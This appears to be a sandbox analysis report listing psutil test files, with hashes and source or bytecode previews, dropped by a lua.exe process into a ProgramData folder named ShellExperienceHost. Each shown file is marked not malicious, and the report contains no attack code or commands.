Preview:	# Copyright (c) 2009, Giampaolo Rodola'. All rights reserved..# Use of this source code is governed by a BSD-style license that can be.# found in the LICENSE file..."""Windows platform implementation."""..import contextlib.import errno.import functools.import os.import signal.import sys.import time.from collections import namedtuple..from . import _common.from ._common import AccessDenied.from ._common import conn_tmap.from ._common import conn_to_ntuple.from ._common import debug.from ._common import ENCODING.from ._common import ENCODING_ERRS.from ._common import isfile_strict.from ._common import memoize.from ._common import memoize_when_activated.from ._common import NoSuchProcess.from ._common import parse_environ_block.from ._common import TimeoutExpired.from ._common import usage_percent.from ._compat import long.from ._compat import lru_cache.from ._compat import PY3.from ._compat import range.from ._compat import unicode.from ._psutil_windows import ABOVE_NORMAL_PRIORITY_CLASS

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil\tests\__init__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	57568
Entropy (8bit):	4.733428825491887
Encrypted:	false
SSDEEP:	768:NYgP2iyeDtkB0vMJyFgs+L9zLFB4BijvB14VXoxnJInoDUpZGJlCB+SCQkTa1eYk:Nfus0htYdolSGJlCB+SCQkTaYYnCV
MD5:	23AC9370EC0E8052B04591E7B7D5E874
SHA1:	A854D1E7F72BDD55A6CA89367A19179F5FB22655
SHA-256:	E9214AFF381AFEA52724E9CA17A00859AB0A18863077A5D7A978372B12625F56
SHA-512:	238C7F666973403259FE4347E3E686B2ED5767FB92DF61E1E2CED963AB4FB6A012F7B69AF4CD2E5A50490AE948D7D988FF8F04B2CF0B596F2D17D2B5C4828E9E
Malicious:	false
Preview:	# -- coding: utf-8 --..# Copyright (c) 2009, Giampaolo Rodola'. All rights reserved..# Use of this source code is governed by a BSD-style license that can be.# found in the LICENSE file...""".Test utilities.."""..from __future__ import print_function.import atexit.import contextlib.import ctypes.import errno.import functools.import gc.import inspect.import os.import random.import re.import select.import shutil.import signal.import socket.import stat.import subprocess.import sys.import tempfile.import textwrap.import threading.import time.import warnings.from socket import AF_INET.from socket import AF_INET6.from socket import SOCK_STREAM..import psutil.from psutil import AIX.from psutil import FREEBSD.from psutil import LINUX.from psutil import MACOS.from psutil import POSIX.from psutil import SUNOS.from psutil import WINDOWS.from psutil._common import bytes2human.from psutil._common import print_color.from psutil._common import supports_ipv6.from psutil._compat import FileExistsErro

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil\tests\__main__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	291
Entropy (8bit):	4.90766919896918
Encrypted:	false
SSDEEP:	6:HWaHi32gLBKWg6ldMRyXk9BwE7KvfHHIXp6qv:HKXKWg6ldMwSwGx4U
MD5:	9F4243ED6FE2B594878F5368D163CF33
SHA1:	88221B1A8461604AB8284FBFD34D4A68AE880A52
SHA-256:	6C17CC3EEFE03F3CA203881F0054992E4ECBC8B48F4D4207405535905723FCE9
SHA-512:	5BB9F99CD9A834E92D5011377203760A2C7654CA7F90C0D87486A625213D95AD7C0BC81147069E723856AC596F2C7471C9918AF8AF88AA47DFB94F5F45DB8EB0
Malicious:	false
Preview:	#!/usr/bin/env python3..# Copyright (c) 2009, Giampaolo Rodola'. All rights reserved..# Use of this source code is governed by a BSD-style license that can be.# found in the LICENSE file...""".Run unit tests. This is invoked by:.$ python -m psutil.tests."""..from .runner import main.main().

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil\tests\__pycache__\__init__.cpython-37.pyc Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	47171
Entropy (8bit):	5.54799512491024
Encrypted:	false
SSDEEP:	768:2BOvZvffgiiynb01MJiLTzDHgS63SV7BijYdUu1g3V53ukAiGmq93srbHsUE8NMs:G+0HzrW3SVc3UmSUdNz
MD5:	2B8EA96FA56875385287CD116A86CDA9
SHA1:	D644B1B865F7646D92564304CE00FB534C1ECEA9
SHA-256:	342E5EA23DDBA1CAB2809E9E4F7E01647C5B130AD66A170F25B1C92BA120DA0E
SHA-512:	229FEFF663DCEDA53960C9EA1544A49CD1ED8A0C74A3C9BDB7C87A2C46A1CAD69E9B0B6E6D0CE65F263F1082DCFAEBBD2E1C13D4283AA1FBF38F03480E180EB1
Malicious:	false
Preview:	B.........R`.................E...@...s....d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m Z ..d.d.l.m!Z!..d.d.l.m"Z"..d.d.l.m#Z#..d.d.l$m%Z%..d.d.l$m&Z&..d.d.l$m'Z'..d.d.l(m)Z)..d.d.l(mZ..d.d.l(m+Z+..d.d.l(m,Z,..d.d.l(m-Z-..d.d.l(m.Z...d.d.l(m/Z/..d.d.l(m0Z0..e+..r.d.d.l1Z1n.d.d.l2Z1y.d.d.l1m3Z3..W.n<..e4k...r(......e..5......e..6d.....d.d.l3Z3W.d.Q.R.X.Y.n.X.e.j7d.k...r@d.d.l8Z8n.d.Z8d.d.d.d.d d!d"d#d$d%d&d'd(d)d*d+d,d-d.d/d0d1d2d3d4d5d6d7d8d9d:d;d<d=d>d?d@dAdBdCdDdEdFdGdHdIdJdKdLdMdNdOdPdQdRdSdTdUdVdWdXdYdZd[d\d]d^d_d`gEZ9dae.j:k.Z;d.e.j<k.Z=dbe.j<k...p.dce.j<k.Z>e=..p.e>Z?e.j@ddk.ZAdeZBdfZCdgZDdhZEe?..rFeBdi9.ZBeEdi9.ZEeCdi9.ZCeDdi9.ZDe.jFdjk...r`dke..G....ZHn.dle..G....ZHe.dm..ZIe+..r.dn.Jdodp..ZKn.dqZKe..L...M..drk.ZNe.jO.Pe.jO.Qe.jO.ReS..dsds....ZTe.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil\tests\__pycache__\__main__.cpython-37.pyc Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	267
Entropy (8bit):	5.150797386568035
Encrypted:	false
SSDEEP:	6:/CElO/GBL5XkQL37KvfHHqbrW2/Q/caGArNotGm/O:aEc/GBNZvJW2/IaX/O
MD5:	7CF1BCB2C613A2A01D7F2A8509690F21
SHA1:	6CEA085F71AE988C26CF3B4797408523C7D75011
SHA-256:	2A4B595F7EE7157B27942EE854B68ABEF7CFEF99A10F315C5F2BE9B40201F6B7
SHA-512:	DD1E69792CFBD415CE799A1BC44146C622E6A81AB73A69DFDDC148436147FFA5D26FDBB0B41D3998C33901CED59093444E676C40FC26ED04D5691212443A2300
Malicious:	false
Preview:	B.........R`#....................@...s....d.Z.d.d.l.m.Z...e.....d.S.).z>.Run unit tests. This is invoked by:.$ python -m psutil.tests......)...mainN)...__doc__..runnerr......r....r.....:D:\python-3.7.3\Lib\site-packages\psutil/tests/__main__.py..<module>....s........

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil\tests\__pycache__\runner.cpython-37.pyc Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	10976
Entropy (8bit):	5.364945159020092
Encrypted:	false
SSDEEP:	192:tdrv+wXBPR7R81PbMsR51dtVI3PRdk/VnDd2Vw89DVFE0TSGJuHPpFrTPhw:tdrv+8X7RcDBHWCVDdO7RFE0T7uHPpBm
MD5:	3A915D457B8E9C38773D0B9392E23F4E
SHA1:	0F3CEB250685F30666306E068D9E93EE680879AB
SHA-256:	E6A8B7FC1F33C46A962ED2048DD39209EDC00065DAD58EA7168E452B04543C08
SHA-512:	56A7FFD5057E786EE84B841C4F21D5F41935D44DC06DB1AB53F16B6BB067A81CF00DAEB4D35C8A83F928B991B201AF264D9D8C1E8185467C2B4575F8DC793369
Malicious:	false
Preview:	B.........R`D,...................@...s....d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.y.d.d.l.Z.W.n...e.k.rl......d.Z.Y.n.X.y.d.d.l.Z.W.n...e.k.r.......d.Z.Y.n.X.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z.d.Z.e.......p.d.Z.e.....oe...Z.e.j.. e.j..!e"....Z#e.j$j%Z%d$d.d...Z&G.d.d...d...Z'G.d.d...d.e.j(..Z)G.d.d...d.e.j..Z+G.d.d...d.e+..Z,d%d.d...Z-d.d...Z.d.d ..Z/d!d"..Z0e1d#k...r.e0....d.S.)&aA....Unit test runner, providing new features on top of unittest module:.- colourized output.- parallel run (UNIX only).- print failures/tracebacks on CTRL+C.- re-run failed tests only (make test-failed)..Invocation examples:.- make test.- make test-failed..Parallel:.- make test-parallel.- make test-process ARGS=--parallel......)...print_functionN)...hilite)...print_color)...term_supports_colors)...super)...CI_TESTING)...import_module_by_path)...print_sysinfo)...reap_children)...safe_rmpath..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil\tests\__pycache__\test_aix.cpython-37.pyc Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3336
Entropy (8bit):	5.567481387184133
Encrypted:	false
SSDEEP:	48:PVmiOsfb8oEkUbsoKORp5IsYhi0M9+pqtUW85P6p/2VQyfBEg+s5J2Us6DQckWoW:9mK9EvooKYyFU+A8cRSQypEy7ytcV3KA
MD5:	FF70E071C682A95F9D9740EE80036095
SHA1:	FDE16E65189DE6EA752665EB341703D350D9B76E
SHA-256:	F8C68E65BBB861CAEAC11AB537646C3F21071375583D5154B0B8ECB96986EA82
SHA-512:	66772A375F5F0F6C1A9B5A7C92ED529B704943FEC0DAAB91F9E352A4A7CAE78494909D9A42D052E793088A0DE9B104CE9EE994E12C9CDD15B8BB5219562CBCDF
Malicious:	false
Preview:	B.........R`.....................@...s....d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.Z.e...e...d...G.d.d...d.e.....Z.e.d.k.r~d.d.l.m.Z...e.e.....d.S.).z.AIX specific tests......N)...AIX)...PsutilTestCase)...sh)...unittestz.AIX onlyc................@...s4...e.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...AIXSpecificTestCasec................C...s....t.d...}.d.}.x.d.....D.].}.\|.d.\|.f...7.}.q.W.t...\|.\|...}.\|...\|.d.....d.}.t.\|...d.....\|...}.t.\|...d.....\|...}.t.\|...d.....\|...}.t.\|...d.....\|...}.t.....}.d.\|...\|...}.\|...\|.j.\|.....\|.j.\|.j.\|.\|.d.....\|.j.\|.j.\|.\|.d.....\|.j.\|.j.\|.\|.d.....d.S.).Nz./usr/bin/svmon -O unit=KBz.memory\s*z+size inuse free pin virtual available mmodez.(?P<%s>\S+)\s+z(svmon command returned unexpected outputi......size..availableZ.inuse..free.....)...delta).r......split..re..search..assertIsNotNone..int..group..psutilZ.virtual_memory..assertEqual..total..assertAlmostEqual..usedr....r....)...self..out..re_pattern..field..matchobjZ.KBr....r....

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil\tests\__pycache__\test_bsd.cpython-37.pyc Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	19932
Entropy (8bit):	5.251581977642734
Encrypted:	false
SSDEEP:	384:M5XQWxoCXO10bypsOawX+b7EdDlH6ppMVINbXu116Z9hgWUHT0xK9:mXQ6oHat6DlH6ppMVINgUZ9hgWUHT0xw
MD5:	8061BA275E05D9AA821C36A59EBCD689
SHA1:	8B2243843953BE495305054929A36BA4A6D232B1
SHA-256:	30E1B4BE6EA3B353F764877D950DAC8C27F07F7D6FB3F84AD6CD008F381A66C4
SHA-512:	2C776A73BB1164ED508FD6C24A37612F11474E0578C22F8E17CA767DB9A7B2F04E5A4AA59F0B4D7022653E0C36B0A5DD9057146D0DF94B6F950DCE7298201AC6
Malicious:	false
Preview:	B.........R`.P...................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.r.d.d.l.m.Z...e...Z.e.....d.k.r.e.d...r.d.n.d.Z.n.d.Z.d.Z.d.d...Z.d.d...Z.e...e...d...G.d.d...d.e.....Z.e...e...d...G.d.d...d.e.....Z.e...e...d...G.d.d...d.e.....Z.e...e...d...G.d d!..d!e.....Z.e...e...d"..G.d#d$..d$e.....Z e!d%k...r.d.d&l"m#Z#..e#e$....d.S.)'z$Tests specific to all BSD platforms......N)...BSD)...FREEBSD)...NETBSD)...OPENBSD)...spawn_testproc)...HAS_BATTERY)...PsutilTestCase)...retry_on_failure)...sh)...TOLERANCE_SYS_MEM)...terminate)...unittest)...which)...getpagesize..museTFc................C...sh...t.d.\|.....}.t.r(\|.\|...d...d...d.....}.n.t.s0t.rF\|.\|...d...d...d.....}.y.t.\|...S...t.k.rb......\|.S.X.d.S.).zmExpects a sysctl command with an argument and parse the result. returning only the value of interest.. z.sysctl z.: ..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil\tests\__pycache__\test_connections.cpython-37.pyc Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	15927
Entropy (8bit):	5.392057724109373
Encrypted:	false
SSDEEP:	192:niwtg6JPa0dm/ynysyjyKypy5VIysgVAcRAmMtlrK1sQgGiecRz6V4NcNtX/XaQ:ndhaqKVnAcR1Mtlm1/gGiec/NcaQ
MD5:	9FD9D43E3609D895D17AB4AC0002FA89
SHA1:	8AA99F05E537CD99D94E639D326E5D1433449FE8
SHA-256:	C6E56E940E500B33035D9724E8DF18BB316ED0C21D0C53E5481808C659B096C5
SHA-512:	A21B5C5A1E36866AFF032D0F0DBBDC0444087486BFD3512B786215F4BA04A027A18DD813B072B25BFDF2FB3F6AE8CBAB252C6656CC8592850EEEE5491C5EE814
Malicious:	false
Preview:	B.........R`.S...................@...sr...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m Z ..d.d.l.m!Z!..d.d.l.m"Z"..d.d.l.m#Z#..d.d.l.m$Z$..d.d.l.m%Z%..d.d.l.m&Z&..d.d l.m'Z'..d.d!l.m(Z(..e..)..Ze+e.d"e,....Z-e.j.d.d#....d$k.Z/e"G.d%d&..d&e.....Z0G.d'd(..d(e0..Z1e"G.d)d..d*e0....Z2e"G.d+d,..d,e0....Z3G.d-d...d.e0..Z4e&.5e$d/..G.d0d1..d1e0....Z6G.d2d3..d3e...Z7e8d4k...rnd.d5l9m:Z:..e:e;....d.S.)6z;Tests for net_connections() and Process.connections() APIs......N)...closing)...AF_INET)...AF_INET6)...SOCK_DGRAM)...SOCK_STREAM)...FREEBSD)...LINUX)...MACOS)...NETBSD)...OPENBSD)...POSIX)...SUNOS)...WINDOWS)...supports_ipv6)...PY3)...AF_UNIX)...bind_socket)...bind_unix_socket)...check_connection_ntuple)...create_sockets)...HA

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil\tests\__pycache__\test_contracts.cpython-37.pyc Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	26467
Entropy (8bit):	5.245749260692421
Encrypted:	false
SSDEEP:	768:TF6Myn4Ps5y6Dz2J/dS9PeOW7oDiUpYzTzKe7t:8MJPsdc+E7QB6Vt
MD5:	BA57E8E4DDD749D9AA915AB21CED24DE
SHA1:	D099DCDAD123454B4ABBC2099A1A78BEFA242F06
SHA-256:	5CA4CF72037E1FF34B84E1898DFCCB5310ECF96A357ED80754725BFDAC8AF358
SHA-512:	BB636629C5EBF11EB8BC1EFB7A5478DEF29FA2FE40F3C156A8FED21096FA5499DEE321068B5789F1B464C53B1057019AA55080CFCAB5FD45EBE5E749A18E89B0
Malicious:	false
Preview:	B.........R`.i...................@...sf...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m Z ..d.d.l.m!Z!..d.d.l.m"Z"..d.d.l.m#Z#..d.d.l.m$Z$..d.d.l.m%Z%..d.d.l.m&Z&..d.d.l.m'Z'..d.d.l.m(Z(..d.d l.m)Z)..d.d!l.mZ..d.d"l.m+Z+..d.d#l.m,Z,..d.d.l.Z.G.d$d%..d%e'..Z-G.d&d'..d'e'..Z.G.d(d)..d)e'..Z/G.d*d+..d+e'..Z0G.d,d-..d-e'..Z1d.d/..Z2e)G.d0d1..d1e'....Z3e4d2k...rbd.d3l5m6Z6..e6e7....d.S.)4z.Contracts tests. These tests mainly check API sanity in terms of.returned types and APIs availability..Some of these are duplicates of tests test_system.py and test_process.py......N)...AIX)...BSD)...FREEBSD)...LINUX)...MACOS)...NETBSD)...OPENBSD)...OSX)...POSIX)...SUNOS)...WINDOWS)...FileNotFoundError)...long)...range)...APPVEYOR)...chec

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil\tests\__pycache__\test_linux.cpython-37.pyc Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	72503
Entropy (8bit):	5.437558825692428
Encrypted:	false
SSDEEP:	1536:IePv6U6yQun06mZYL1GDdWCLWTNzcMJATxb/axJ:IeH6d3un06mZYhGDMzcPTxrav
MD5:	42FF7F5E61B3920071E782912AD7B0CD
SHA1:	0A0DE1120B679B5F6858D3324B5BEC818EC45928
SHA-256:	C34C9358D65ACDCDAC1F4E5AEF39A7CDF3E141985907E34FBAEEC7293E508365
SHA-512:	662C529DF01F899A8922E3DCC3F516422CCAF2ACE4C038253B43C9CBA1F9C57832D9D09A000C6BBC370C799FAC67CB1AA0FDD0ADE1FE28F114D0E4966CA6340F
Malicious:	false
Preview:	B.........R`.^...................@...s....d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m Z ..d.d.l.m!Z!..d.d.l.m"Z"..d.d.l.m#Z#..d.d.l.m$Z$..d.d.l.m%Z%..d.d.l.m&Z&..d.d.l.m'Z'..d.d.l.m(Z(..d.d.l.m)Z)..d.d.l.mZ..e.j+.,e.j+.-e.....Z/d.Z0d.Z1d.Z2d.Z3d Z4e...r.d!Z5e...d"....Z6d#d$..Z7d%d&..Z8d'd(..Z9d)d*..Z:d+d,..Z;d-d...Z<d/d0..Z=d1d2..Z>d3d4..Z?e.j@d5d6....ZAe.j@d7d8....ZBe).Ce...d9..G.d:d;..d;e.....ZDe).Ce...d9..G.d<d=..d=e.....ZEe).Ce...d9..G.d>d?..d?e.....ZFe).Ce...d9..G.d@dA..dAe.....ZGe).Ce...d9..G.dBdC..dCe.....ZHe).Ce...d9..G.dDdE..dEe.....ZIe).Ce...d9..G.dFdG..dGe.....ZJe).Ce...d9..G.dHdI..dIe.....ZKe).Ce...d9..G.dJdK..dKe.....ZLe).Ce...d9..G.dLdM..dMe.....ZMe).Ce...d9..G.dNdO..dOe.....ZNe).Ce...d9..G.dPdQ..dQe.....ZOe).Ce...d9..G.dRdS..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil\tests\__pycache__\test_memleaks.cpython-37.pyc Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	22836
Entropy (8bit):	5.029831974326229
Encrypted:	false
SSDEEP:	384:bkJpwvC4O2BY+X+uNDIC/6swRLp5CZj8Xwx+hPEPjuWowaA0G+LX6QH87e5VaJZ:bkvw8o/wiKPZjLX6QcIaJZ
MD5:	D4C598C7E6FD336CD8927F6C010F73CA
SHA1:	A79101B5EADB577AD715E45472A6A64C39C321B5
SHA-256:	52191F7FE5D6688C346F2596A91B3A5AA0FF1F3719195AE24B7950DA16B4C9BE
SHA-512:	5A2EFE48AAFDE0389E8DA3719587F51F595F2696C050D8FA6F5AEA4CCFDF2EBBE65DA46607840A4436C67F870F3AC97BC0DB06A469775C2ADFEC0A9395A27D8D
Malicious:	false
Preview:	B.........R`.9...................@...s....d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m Z ..d.d.l.m!Z!..d.d.l.m"Z"..d.d.l.m#Z#..d.d.l.m$Z$..d.d l.m%Z%..e.j&j'Z'e..(..Z)d!Zd"d#..Z+G.d$d%..d%e$..Z,G.d&d'..d'e,..Z-e%..e...d(..G.d)d..d*e$....Z/G.d+d,..d,e$..Z0e1d-k...r.d.d.l2m3Z3..e3e4....d.S.)/a.....Tests for detecting function memory leaks (typically the ones.implemented in C). It does so by calling a function many times and.checking whether process memory usage keeps increasing between.calls or over time..Note that this may produce false positives (especially on Windows.for some reason)..PyPy appears to be completely unstable for this framework, probably.because of how its JIT handles memory, so tests ar

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil\tests\__pycache__\test_misc.cpython-37.pyc Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	23510
Entropy (8bit):	5.243505119388284
Encrypted:	false
SSDEEP:	384:JU+KMIN0WzLA/FNljhNpdaVIObcS41lfIR/Wi4riZc09y:J3IN/zLmNljfpdqIO81vrYc09y
MD5:	4E0DFB568BAFCA6888678DD9382BD9C3
SHA1:	3AF34336F21959CC111D3310A1E0145DE30C9F2B
SHA-256:	B9AFFC44F990B6D546F439BE132E4BF8D46BDC1D857D0B1681CB32D218D51151
SHA-512:	1F819FC3B427961E83BB9893657BD61F47811C803A32BFDC0A7CCBA3107BC984FCF28A353F454ECFBE24BDD1A6523F8F46F36B6F605FCB9A87452DA58065D620
Malicious:	false
Preview:	B.........R`.o...................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m Z ..d.d.l.m!Z!..d.d.l.m"Z"..d.d.l.m#Z#..d.d.l.m$Z$..d.d.l.m%Z%..d.d.l.m&Z&..d.d.l.Z.d.d.l.Z.e.j'd.d.....d.k.Z(G.d.d...d.e ..Z)e..*d d!..Z+G.d"d#..d#e ..Z,e&.-e.j../e$....d$..G.d%d&..d&e ....Z0e1d'k...r.d.d(l2m3Z3..e3e4....d.S.))z..Miscellaneous tests.......N)...LINUX)...POSIX)...WINDOWS)...memoize)...memoize_when_activated)...supports_ipv6)...wrap_numbers)...PY3)...APPVEYOR)...CI_TESTING)...HAS_BATTERY)...HAS_MEMORY_MAPS)...HAS_NET_IO_COUNTERS)...HAS_SENSORS_BATTERY)...HAS_SENSORS_FANS)...HAS_SENSORS_TEMPERATURES)...import_module_by_path)...mock)...PsutilTestCase)...PYTHON_EXE)...reload_module)...ROOT_DIR)...SCRIPTS_DIR)...sh)...unittest.....).......

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil\tests\__pycache__\test_osx.cpython-37.pyc Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7225
Entropy (8bit):	5.28941900542013
Encrypted:	false
SSDEEP:	96:gtx5+qbTb6imOWmysEu5dZp7yr/0eEvM9Lkis/HzZ+TcwC7MfDKyaJX/fU:Mx5+qT6Yiu5vNyYeEkVsPocwN7Kr1/fU
MD5:	AD85B4E9923A5EE5C5D29081A1540EE9
SHA1:	784BC86D7A54CB2A426B1D4B344FA417109C050D
SHA-256:	ADBD680853E6A1290A8A617AEF8528A5C58025F9D4686996F026AAD94036CD02
SHA-512:	CD709DAE8C9EF235EF2AC9D5CF36F08F0CEA9CF4C126DB9343CD3466B6910D3627CB930295665AC9DC997DC151A3D5B8AC01835940D9747F32A309C770E39E38
Malicious:	false
Preview:	B.........R`~....................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d...Z.d.d...Z.d.d...Z.e...e...d...G.d.d...d.e.....Z.e...e...d...G.d.d...d.e.....Z.e.d.k...r.d.d.l.m.Z...e.e.....d.S.).z.macOS specific tests......N)...MACOS)...HAS_BATTERY)...PsutilTestCase)...retry_on_failure)...sh)...spawn_testproc)...terminate)...TOLERANCE_DISK_USAGE)...TOLERANCE_SYS_MEM)...unittestc................C...s6...t.\|...}.\|.....d...}.y.t.\|...S...t.k.r0......\|.S.X.d.S.).zmExpects a sysctl command with an argument and parse the result. returning only the value of interest.. .....N).r......split..int..ValueError).Z.cmdline..out..result..r.....:D:\python-3.7.3\Lib\site-packages\psutil/tests/test_osx.py..sysctl....s................r....c................C...sV...d.d.l.m.}...t.d...}.x$\|...d...D.].}.\|.\|.k.r P.q W.t.d.....t.t...d.\|.....d.....\|.....S.).z)Wrapper around 'vm_stat' cmdline u

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil\tests\__pycache__\test_posix.cpython-37.pyc Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	12833
Entropy (8bit):	5.299084684478016
Encrypted:	false
SSDEEP:	192:JBuFb9W/ou/qXEJU6Xuxf5XuxH+GTPKbsldCG/fUDAyoijD9rJQG5rh76S9P:Hud9YmzVjD9rJQG5r8S9P
MD5:	DBAEE5B5550EE631D738EF57FD688322
SHA1:	005D60BD6AADB09832022B963CF6695DB324D52D
SHA-256:	5542093E79357BB66B625FC841D3D81C15FC609855F6AAA1ABCB22C73942FD2A
SHA-512:	6626B3B775375306811156C3B1CAF9CC5A2ED73208E3A7AD508835489658C5D6CFE72EB9BA62D30D9D14F1DB010484BFA92C9FE7086E76425465C82DF6111BD6
Malicious:	false
